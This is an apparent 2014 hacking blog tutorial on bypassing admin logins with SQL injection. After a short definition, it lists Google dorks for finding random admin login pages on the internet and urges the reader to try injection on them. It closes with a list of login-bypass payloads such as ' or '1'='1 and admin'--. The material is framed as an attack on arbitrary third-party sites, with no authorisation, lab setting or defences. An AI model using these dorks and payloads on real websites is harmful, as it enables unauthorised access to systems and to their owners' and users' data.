March 16, 2014
Exploiting Web Applications by SQL Injection (Step By Step Tutorial)
Hello Readers, Today I am sharing with you how to
exploit web application by SQL Injection Attack. In this post step by step I show
you how to bypass admin login using some queries.
What
is SQL Injection?
SQL Injection is a code injection technique that
exploits a security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed. It is an
instance of a more general class of vulnerabilities that can occur whenever one
programming or scripting language is embedded inside another. SQL injection
attacks are also known as SQL insertion attacks.
[Step – 1] Find
SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1)
By Google Dork
Google dorks are the center of the Google Hacking.
Google database is the biggest so hackers use to exploit that database by using
various search engine commands or complex search queries to locate sensitive
data and vulnerable devices on the internet. For Example use this Google Dork
to find randomly vulnerable website for SQL injection.
There
is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
after this you will see many websites in google search ..
try the sql injection on these...
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We
can use these to bypass login authentication. These queries confuse the
databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
hi" or "a"="a
hi" or 1=1 --
